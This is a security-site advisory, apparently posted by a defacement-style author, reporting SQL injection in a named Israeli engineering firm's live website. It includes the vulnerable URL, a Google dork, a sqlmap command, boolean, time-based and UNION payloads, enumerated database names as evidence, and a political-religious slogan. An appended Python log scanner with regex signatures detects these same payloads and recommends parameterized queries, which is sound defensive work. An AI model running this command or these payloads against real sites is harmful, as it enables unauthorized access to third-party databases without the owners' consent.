HRVAC Consulting Engineering Israel SQL Injection Vulnerability

2021.12.26
Emyounoone (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: HRVAC Consulting Engineering Israel SQL Injection Vulnerability
# Author: Emyounoone
# Google Dork: page.php?ID=112
# Date: 11/08/2021
# Vendor Homepage: https://www.hrvac.co.il
# Tested on: Kali Linux
# Vulnerable Path: https://www.hrvac.co.il/page.php?ID=112

# python3 sqlmap.py https://www.hrvac.co.il/page.php?ID=112 --dbs --random-agent

---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=112' AND 7844=7844 AND 'cGIy'='cGIy

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: ID=112' OR (SELECT 1875 FROM (SELECT(SLEEP(5)))qItF) AND 'aNeS'='aNeS

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: ID=112' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a717871,0x645043656450477a766165584669646c7562665768736f56634f6f744d45476b766f4d4968727349,0x71717a7171),NULL,NULL,NULL-- -
---

#Evidence:
available databases [2]:
[*] hrvac_site
[*] information_schema

# JERUSALEM BELONGS TO ISLAM !
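All three payload classes in the sqlmap output above depend on the `ID` parameter carrying something other than an integer. As an added example (not part of the original advisory), the Python code below flags such requests in web access logs and labels the technique; the combined log format, the sample lines, and the names `classify_id` and `scan` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the three techniques listed in the sqlmap output above.
SIGNATURES = [
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("boolean-based blind", re.compile(r"'\s*(AND|OR)\s+\d+\s*=\s*\d+", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Nov/2021:10:00:01 +0000] "GET /page.php?ID=112 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [08/Nov/2021:10:00:05 +0000] "GET /page.php?ID=112%27%20AND%207844%3D7844%20AND%20%27cGIy%27%3D%27cGIy HTTP/1.1" 200 5120',
    '198.51.100.9 - - [08/Nov/2021:10:00:11 +0000] "GET /page.php?ID=112%27%20OR%20(SELECT%201875%20FROM%20(SELECT(SLEEP(5)))qItF)%20AND%20%27aNeS%27%3D%27aNeS HTTP/1.1" 200 5120',
    '198.51.100.9 - - [08/Nov/2021:10:00:12 +0000] "GET /page.php?ID=112%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 812',
]

def classify_id(value):
    """Return None for a plain integer ID, else a label for the anomaly."""
    if value.isascii() and value.isdigit():
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "non-numeric ID"

def scan(log_lines, param="ID"):
    """Return (line_number, label, decoded_value) for each suspicious request."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes the value, so signatures see the real payload.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            label = classify_id(value)
            if label:
                findings.append((n, label, value))
    return findings

if __name__ == "__main__":
    for n, label, value in scan(SAMPLE_LOG):
        print(f"line {n}: {label}: {value}")
```

The integer check is the stronger control: applied in the application itself (cast or validate `ID`, then bind it in a parameterized query), it rejects every payload shown, while the signatures only help triage log hits.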


Copyright 2024, cxsecurity.com

 
